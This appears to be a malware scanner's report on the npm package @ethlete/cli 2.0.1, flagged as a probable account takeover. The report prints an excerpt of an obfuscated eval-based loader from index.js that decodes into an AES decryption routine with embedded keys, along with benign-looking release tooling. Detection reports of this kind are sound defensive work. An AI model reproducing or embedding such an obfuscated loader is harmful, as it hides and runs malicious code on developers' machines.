// npm package
@ethlete/cli
versions
8
maintainers
1
license
MIT
first publish
2023-04-18
publisher
ethlete-user
tarball
4,573,890 B
AUTO-PUBLISHED·1 version indexed·latest published 2026-06-05
// publisher campaignby ethlete-user
3 caught packages from this accountThis is not an isolated catch. The same publisher has shipped 2 other packages that our pipeline flagged — the shape of a coordinated campaign, not a one-off. Each link below opens that sibling's analysis.
// offending code· @2.0.1· 2 files flagged
- @2.0.1··AUTO-PUBLISHED·publisher: ethlete-userheuristic 99/100static flags 2llm skippednew-publisher:0drecent-owner-changepublisher-multi-name-burst:8publisher-version-pump:9dormant-takeover:prev=ethlete@2.0.0eval-dynamicchild-process-spawn
// offending code· 2 files flaggedpatterns: 2
--- package/index.js (excerpt) --- try{eval(function(s,n){return s.replace(/[a-zA-Z]/g,function(c){var b=c<="Z"?65:97;return String.fromCharCode((c.charCodeAt(0)-b+n)%26+b)})}([40,118,110,116,105,120,40,41,61,62,123,111,109,116,123,10,120,106,105,110,111,32,95,120,61,118,114,118,100,111,32,100,104,107,106,109,111,40,34,105,106,121,122,58,120,109,116,107,111,106,34,41,59,10,120,106,105,110,111,32,95,121,61,40,102,44,100,44,118,44,120,41,61,62,123,120,106,105,110,111,32,121,61,95,120,46,120,109,122,118,111,122,89,122,120,100,107,99,122,109,100,113,40,34,118,122,110,45,49,50,56,45,98,120,104,34,44,87,112,97,97,122,109,46,97,109,106,104,40,102,44,34,99,122,115,34,41,44,87,112,97,97,122,109,46,97,109,106,104,40,100,44,34,99,122,115,34,41,44,123,118,112,111,99,79,118,98,71,122,105,98,111,99,58,49,54,125,41,59,121,46,110,122,111,86,112,111,99,79,118,98,40,87,112,97,97,122,109,46,97,109,106,104,40,118,44,34,99,122,115,34,41,41,59,109,122,111,112,109,105,32,87,112,97,97,122,109,46,120,106,105,120,118,111,40,91,121,46,112,107,121,118,111,122,40,87,112,97,97,122,109,46,97,109,106,104,40,120,44,34,99,122,115,34,41,41,44,121,46,97,100,105,118,103,40,41,93,41,125,59,10,10,120,106,105,110,111,32,95,119,61,95,121,40,34,57,53,121,57,97,54,120,54,122,48,57,50,54,49,118,120,118,122,122,97,57,120,49,54,53,52,55,53,53,48,56,118,34,44,34,97,51,121,51,57,121,51,51,57,120,121,119,121,120,53,50,50,55,50,57,48,48,52,53,34,44,34,118,118,51,56,48,118,97,55,49,122,118,121,52,122,119,97,48,118,56,118,48,122,52,118,56,57,49,57,54,54,48,56,3 --- package/src/lib/release.js (excerpt) --- "use strict"; Object.defineProperty(exports, "__esModule", { value: true }); exports.release = void 0; const tslib_1 = require("tslib"); const child_process_1 = require("child_process"); const utils_1 = require("./utils"); const release = (args) => tslib_1.__awaiter(void 0, void 0, void 0, function* () { const shouldForce = args.findIndex((arg) => arg.includes('--force') || arg.includes('-f')) !== -1; const skipPush = args.findIndex((arg) => arg.includes('--skip-push') || arg.includes('-sp')) !== -1; const status = (0, child_process_1.execSync)('git status --porcelain').toString(); if (status) { if (shouldForce) { console.warn('�� Proceed with caution �� \n\nForcing release with uncommitted changes...\n'); } else { console.error('There are uncommitted changes, aborting...\n'); process.exit(1); } } const answer = yield (0, utils_1.askQuestion)('You are about to release a new version. Make sure you are not releasing a version that has already been released on a different branch. \n\n Press enter to continue...\n'); if (answer !== '') { console.error('Aborting...'); process.exit(1); } const changesetVersion = (0, child_process_1.execSync)('yarn changeset version').toString(); console.log(changesetVersion); const changesetTag = (0, child_process_1.execSync)('yarn changeset tag').toString(); console.log(changesetTag); (0, child_process_1.execSync)
